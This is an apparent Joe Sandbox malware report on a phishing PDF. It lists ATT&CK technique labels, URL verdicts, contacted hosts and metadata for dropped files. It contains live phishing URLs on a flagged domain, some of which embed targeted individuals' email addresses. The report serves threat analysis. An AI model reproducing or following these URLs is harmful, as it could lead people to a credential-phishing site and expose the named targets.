    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformation
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 2 Browser Extensions | 1 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Extra Window Memory Injection | 1 Process Injection | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 4 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 5 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Extra Window Memory Injection | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction

    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN?S=bjones@lakeland.cc.il.us | 100% | Avira URL Cloud | malware |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.us | 100% | Avira URL Cloud | malware |
    https://khfreightgroup.com/favicon.ico | 0% | Avira URL Cloud | safe |
    https://khfreightgroup.com/wp-content/uploads/2024/05/cropped-KH-Freight-Icon-32x32.png | 0% | Avira URL Cloud | safe |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/fd9d1056-4f5113e8da6db9c7.js | 100% | Avira URL Cloud | malware |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/webpack-20efd41c90b5bcbd.js | 100% | Avira URL Cloud | malware |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/media/a34f9d1faa5f3315.p.woff2 | 100% | Avira URL Cloud | malware |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/not-found-9fcb5dc5d913bcdb.js | 100% | Avira URL Cloud | malware |
    https://a.nel.cloudflare.com/report/v4?s=Kka7siyfKKzh0DHyAAs5LLTT2aN7pS%2Bqrfw55tzojkxRCne0dyUrgcHj8QX6HpmOaB4%2FywnN39pt%2FyFZv335nnPj7C%2Fg3qvccqv3frvp99GFev5vl%2FNF0TpkY1svgF06d8Subml9hCqNAuueHB0E53zEzw%3D%3D | 0% | Avira URL Cloud | safe |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/23-e33e3d623cf28c17.js | 100% | Avira URL Cloud | malware |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/7b64cd318fb77179.css | 100% | Avira URL Cloud | malware |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/main-app-653c0408c14c4864.js | 100% | Avira URL Cloud | malware |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=bjones@lakeland.cc.il.us | 100% | Avira URL Cloud | malware |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/page-c71772bf3bad0174.js | 100% | Avira URL Cloud | malware |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/92-2a0dad65b64d730c.js | 100% | Avira URL Cloud | malware |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/f796ea3b426fcf90.css | 100% | Avira URL Cloud | malware |
    https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=jjohns@lakeland.cc.il.us | 100% | Avira URL Cloud | malware |
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    sdspprfd-tftfrtrghf34f3drrs3.net | 104.21.64.1 | true | false | | high
    a.nel.cloudflare.com | 35.190.80.1 | true | false | | high
    e8652.dscx.akamaiedge.net | 92.123.21.129 | true | false | | high
    edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.57.20 | true | false | | high
    www.google.com | 142.250.185.196 | true | false | | high
    khfreightgroup.com | 192.185.25.215 | true | true | | unknown
    x1.i.lencr.org | unknown | unknown | false | | high
    Name | Malicious | Antivirus Detection | Reputation
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/fd9d1056-4f5113e8da6db9c7.js | true | Avira URL Cloud: malware | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.us | true | Avira URL Cloud: malware | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/page-c71772bf3bad0174.js | true | Avira URL Cloud: malware | unknown
    https://khfreightgroup.com/favicon.ico | false | Avira URL Cloud: safe | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/webpack-20efd41c90b5bcbd.js | true | Avira URL Cloud: malware | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/23-e33e3d623cf28c17.js | true | Avira URL Cloud: malware | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=jjohns@lakeland.cc.il.us | true | Avira URL Cloud: malware | unknown
    https://khfreightgroup.com/wp-content/uploads/2024/05/cropped-KH-Freight-Icon-32x32.png | false | Avira URL Cloud: safe | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/main-app-653c0408c14c4864.js | true | Avira URL Cloud: malware | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/media/a34f9d1faa5f3315.p.woff2 | true | Avira URL Cloud: malware | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN?S=bjones@lakeland.cc.il.us | true | Avira URL Cloud: malware | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/7b64cd318fb77179.css | true | Avira URL Cloud: malware | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/92-2a0dad65b64d730c.js | true | Avira URL Cloud: malware | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/not-found-9fcb5dc5d913bcdb.js | true | Avira URL Cloud: malware | unknown
    https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVz | false | | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=bjones@lakeland.cc.il.us | true | Avira URL Cloud: malware | unknown
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/f796ea3b426fcf90.css | true | Avira URL Cloud: malware | unknown
    https://a.nel.cloudflare.com/report/v4?s=Kka7siyfKKzh0DHyAAs5LLTT2aN7pS%2Bqrfw55tzojkxRCne0dyUrgcHj8QX6HpmOaB4%2FywnN39pt%2FyFZv335nnPj7C%2Fg3qvccqv3frvp99GFev5vl%2FNF0TpkY1svgF06d8Subml9hCqNAuueHB0E53zEzw%3D%3D | false | Avira URL Cloud: safe | unknown
    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
    142.250.186.46 | unknown | United States | | 15169 | GOOGLEUS | false
    3.219.243.226 | unknown | United States | | 14618 | AMAZON-AESUS | false
    92.123.21.129 | e8652.dscx.akamaiedge.net | European Union | | 16625 | AKAMAI-ASUS | false
    1.1.1.1 | unknown | Australia | | 13335 | CLOUDFLARENETUS | false
    217.20.57.20 | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Denmark | | 15516 | DK-DANSKKABELTVDK | false
    104.21.64.1 | sdspprfd-tftfrtrghf34f3drrs3.net | United States | | 13335 | CLOUDFLARENETUS | false
    172.217.18.3 | unknown | United States | | 15169 | GOOGLEUS | false
    142.250.185.227 | unknown | United States | | 15169 | GOOGLEUS | false
    192.185.25.215 | khfreightgroup.com | United States | | 46606 | UNIFIEDLAYER-AS-1US | true
    142.251.168.84 | unknown | United States | | 15169 | GOOGLEUS | false
    142.250.185.196 | www.google.com | United States | | 15169 | GOOGLEUS | false
    142.250.185.174 | unknown | United States | | 15169 | GOOGLEUS | false
    35.190.80.1 | a.nel.cloudflare.com | United States | | 15169 | GOOGLEUS | false
    92.123.20.204 | unknown | European Union | | 16625 | AKAMAI-ASUS | false
    172.217.16.195 | unknown | United States | | 15169 | GOOGLEUS | false
    172.64.41.3 | unknown | United States | | 13335 | CLOUDFLARENETUS | false
    172.217.16.142 | unknown | United States | | 15169 | GOOGLEUS | false
                    IP
                    192.168.2.16
                    192.168.2.15
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1641117
                    Start date and time:2025-03-18 02:17:14 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:18
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • EGA enabled
                    Analysis Mode:stream
                    Analysis stop reason:Timeout
                    Sample name:virus.pdf
                    Detection:MAL
                    Classification:mal64.phis.winPDF@36/54@11/179
                    Cookbook Comments:
                    • Found application associated with file extension: .pdf
                    • Exclude process from analysis (whitelisted): svchost.exe
                    • Excluded IPs from analysis (whitelisted): 142.250.185.174, 142.250.185.227, 142.250.186.46, 142.251.168.84, 92.123.20.204, 142.250.185.110, 3.219.243.226, 52.22.41.97, 3.233.129.217, 52.6.155.20, 142.250.184.238, 172.64.41.3, 162.159.61.3
                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, clientservices.googleapis.com, clients.l.google.com, p13n.adobe.io, geo2.adobe.com
                    • Not all processes were analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: khfreightgroup.com
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):290
                    Entropy (8bit):5.2435144629074735
                    Encrypted:false
                    SSDEEP:
                    MD5:EC581CEBB43FC2CDC8BFBE96ABACE271
                    SHA1:014F850ED0411456B001DB61BF799BC394686B67
                    SHA-256:1AE5668901F8379F9CF6A67C2474386467D13E44CEDAB59B2338E64D85BF7B8B
                    SHA-512:AEF90E46ECC9900D3501515345960D6CB33BED6395BEF3C77B8741C66152317923FA07532C4D42FA623FD19D6177551D9AFA1968B52EEE12309DAD94BE69C02E
                    Malicious:false
                    Reputation:unknown
                    Preview:2025/03/17-21:17:45.441 1948 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/03/17-21:17:45.443 1948 Recovering log #3.2025/03/17-21:17:45.444 1948 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):334
                    Entropy (8bit):5.137866221463094
                    Encrypted:false
                    SSDEEP:
                    MD5:A0CFED5DA89300A571006C9D91765F3D
                    SHA1:3BDAC38AEF7101A47EC2446E9D74C742A2C8BD25
                    SHA-256:7DA27F812BE20B25789F86C5E60B807B127469C58809AB4A876558CD455F81E9
                    SHA-512:FD2B27E6F2609D6FDC3730AE2DFC8A40B5BBBF3F3A22329ABFBF9F0984B60CEF6A93B0888EF14C9A0E1DE371ED204D834F0611BDBA8724C826C293DB70ED0879
                    Malicious:false
                    Reputation:unknown
                    Preview:2025/03/17-21:17:45.120 1a04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/03/17-21:17:45.124 1a04 Recovering log #3.2025/03/17-21:17:45.124 1a04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):403
                    Entropy (8bit):4.99670747027479
                    Encrypted:false
                    SSDEEP:
                    MD5:CFADACBD435AB68679A273F8E9251681
                    SHA1:4E118F3120DF0D7AC72095D8BAE109E0A70511B6
                    SHA-256:FC745DB9D247A221D7ADB00EB6E700F46AAD5420A026C8A4FC08FD3BB600A319
                    SHA-512:70BBAB8F78D3213F37891086A8904EF8EB120630F841EF144C9DDDDF56B4B31E3BAF3B9312B148A4635705BD21DE4504E46D962DF03765C2292701663E0645DE
                    Malicious:false
                    Reputation:unknown
                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13386820670975036","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":465670},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):403
                    Entropy (8bit):4.953858338552356
                    Encrypted:false
                    SSDEEP:
                    MD5:4C313FE514B5F4E7E89329630909F8DC
                    SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                    SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                    SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                    Malicious:false
                    Reputation:unknown
                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):0
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:
                    MD5:4C313FE514B5F4E7E89329630909F8DC
                    SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                    SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                    SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                    Malicious:false
                    Reputation:unknown
                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4099
                    Entropy (8bit):5.23343192638433
                    Encrypted:false
                    SSDEEP:
                    MD5:59908309E232EA586A2DC105B95F66D8
                    SHA1:4E1F83B88506BC415A774D2489E554401A509D75
                    SHA-256:15D66903DEB0FE59CDEA5127329C5FA03D846D1F8D443BB8A5C1E7C325D6AECF
                    SHA-512:C49FF1BFB1E2C510573C8658C5A62EEACA667C82A079C3D5DEA7FC2D4853669226B61CD9271D1629E5EF7F7D7407F29AB4471C30F5012D79D45379B5E69C457C
                    Malicious:false
                    Reputation:unknown
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):322
                    Entropy (8bit):5.204955762215564
                    Encrypted:false
                    SSDEEP:
                    MD5:18B22DA05E5B9112AE691FF9A0FCC8C5
                    SHA1:F6AC258120986E2635988F39AF251461DE136CDE
                    SHA-256:312B120E14CA19869EB253541BF04FDB70F31C99FF055573F446B17FDCB91919
                    SHA-512:79CC082A0D245AD25D8DC54586F9BA47DA4C7B937B189A9A3BF07943992D8F3032CAE0BCD08782E2CA80C75FEFCF9AA9DA1DD6F231ACC8B261C713A6E96C5DA6
                    Malicious:false
                    Reputation:unknown
                    Preview:2025/03/17-21:17:45.491 1a04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/03/17-21:17:45.493 1a04 Recovering log #3.2025/03/17-21:17:45.496 1a04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PC bitmap, Windows 3.x format, 164 x -116 x 32, cbSize 76150, bits offset 54
                    Category:dropped
                    Size (bytes):76150
                    Entropy (8bit):2.093863076197932
                    Encrypted:false
                    SSDEEP:
                    MD5:BF9603819489E574D264F869AD0CD4BC
                    SHA1:E9513E85CE19AC9D2FB5BA8729646DE969166DBE
                    SHA-256:9652BAC4A7860105B083EB3D92249E74675B6CCF22633DCD1B118BC9360E7DAC
                    SHA-512:B36AB4C3A2EE92DC70725C26FE8175E8ECD5EF007B695B07FE4A115AC83484410735FA3957AD70E8E6DB98B1EA0613EE5227EF3D4C022985C7CC64C204AB2289
                    Malicious:false
                    Reputation:unknown
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):57344
                    Entropy (8bit):3.291927920232006
                    Encrypted:false
                    SSDEEP:
                    MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                    SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                    SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                    SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                    Malicious:false
                    Reputation:unknown
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite Rollback Journal
                    Category:dropped
                    Size (bytes):16928
                    Entropy (8bit):1.214057698349226
                    Encrypted:false
                    SSDEEP:
                    MD5:4654475C15C15059ACDADF4219AFF60B
                    SHA1:65953FB175C529B4DF3568932728ACCA72984375
                    SHA-256:B980DD4692C527FC5A6C830A1E289BCE24C7838E4D4AD522D04BCCE762619407
                    SHA-512:78998CF5B4BE0B75618C9A938BAEAEE4813B3087017D7E5F166C39A152357251B0A57CC0CCF809EAC3E815F6EE5CD6D7D86871BD5F7AAFBB3A15603AEA59B3D5
                    Malicious:false
                    Reputation:unknown
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:Certificate, Version=3
                    Category:dropped
                    Size (bytes):1391
                    Entropy (8bit):7.705940075877404
                    Encrypted:false
                    SSDEEP:
                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                    Malicious:false
                    Reputation:unknown
                    Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                    Category:dropped
                    Size (bytes):73305
                    Entropy (8bit):7.996028107841645
                    Encrypted:true
                    SSDEEP:
                    MD5:83142242E97B8953C386F988AA694E4A
                    SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                    SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                    SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                    Malicious:false
                    Reputation:unknown
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):192
                    Entropy (8bit):2.756901573172974
                    Encrypted:false
                    SSDEEP:
                    MD5:5F69F2849FA87962A722F25F2ADE845E
                    SHA1:53968DF98022CC3B80CCE3D7A4C12E0B592ECC7C
                    SHA-256:6F50795678D8226C8BFA8C71DC51A050C02A8A13AEA9598FEEFE1270EBD6F3D3
                    SHA-512:D5434D72DD5EAEA87F5F97DB0A7EE80A1FA571AB96F8716B869B6635361851C986F2269FF9DC6049333AFA661B345AD6F59F1E86C62970C0350F80029A2C31B2
                    Malicious:false
                    Reputation:unknown
                    Preview:p...... ...............(....................................................... ..........W.....d..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:modified
                    Size (bytes):330
                    Entropy (8bit):3.183651560957911
                    Encrypted:false
                    SSDEEP:
                    MD5:02C16AE756D149B00D9EE439E65982B5
                    SHA1:71853BD20076A2D1C8902E60629E6ED2462E9BD8
                    SHA-256:2C49B1CEA6EDAC1A5619E167B996B69DCA5AEB6A548C798959617EEF14288FDA
                    SHA-512:4DE3F171E395BFF162618A911B815C2FD5F3A96F35095610A3F10F5747677F0197EA74B71F9F126B5ADF094F18B997D0CCC2284FFD25D774F2527A91E4EA3894
                    Malicious:false
                    Reputation:unknown
                    Preview:p...... ................(....................................................... ..................(...........Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PostScript document text
                    Category:dropped
                    Size (bytes):185099
                    Entropy (8bit):5.182478651346149
                    Encrypted:false
                    SSDEEP:
                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                    Malicious:false
                    Reputation:unknown
                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PostScript document text
                    Category:dropped
                    Size (bytes):0
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:
                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                    Malicious:false
                    Reputation:unknown
                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):295
                    Entropy (8bit):5.367984348501563
                    Encrypted:false
                    SSDEEP:
                    MD5:92B3894311C2260A797AF72363876DB5
                    SHA1:4F40DA4220F0179133C1A45721F13E32EDA92830
                    SHA-256:D1BEA0400036374C9642C82DAAE514716C74A649F74E371A5A605B8C8CBB248F
                    SHA-512:F3BADFD162C4CFCEEAC47BA341B94C7C17D37AF7D959E0FA3AB3E650140108A343464542756AA89CE36E499F7AF222FF6E0B7A3FD0DC645BD292394C83DB9CC6
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.315585563089468
                    Encrypted:false
                    SSDEEP:
